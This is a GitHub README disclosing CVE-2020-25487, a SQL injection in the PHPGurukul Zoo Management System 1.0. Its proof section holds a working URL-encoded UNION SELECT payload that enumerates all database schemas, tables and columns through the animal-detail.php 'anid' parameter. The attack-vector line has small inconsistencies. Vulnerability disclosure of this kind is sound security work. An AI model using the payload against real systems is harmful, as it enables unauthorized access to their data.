Skip to content
/ CVE-2020-25487 Public

SQL injection Vulnerability in Zoo Management System

1 star 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Ko-kn3t/CVE-2020-25487

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
README.md
README.md
 
 

Repository files navigation

CVE-2020-25487

#SQL injection Vulnerability in Zoo Management System V 1.0

#Vendor - https://phpgurukul.com

#Product - https://phpgurukul.com/zoo-management-system-using-php-and-mysql/

#Vulnerability Type - SQL injection

#Affected Component - zms/animal-detail.php

#Attack Type- Local

#Impact Code execution - true

#Attack Vectors - Go to client webpage and do sql injection at http:///details.php?anid=

#Proof :

http://localhost/zms/animal-detail.php?anid=9%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,(select (@a) from(select(@a:=0x00),(select (@a) from(information_schema.columns)wheretable_schema!='information_schema' and(@a)in(@a:=concat(@a,table_schema,' > ',table_name,' >',column_name,'
'))))a),NULL,NULL,NULL,NULL--%20-

About

SQL injection Vulnerability in Zoo Management System

Resources

Readme
Activity

Stars

1 star

Watchers

2 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published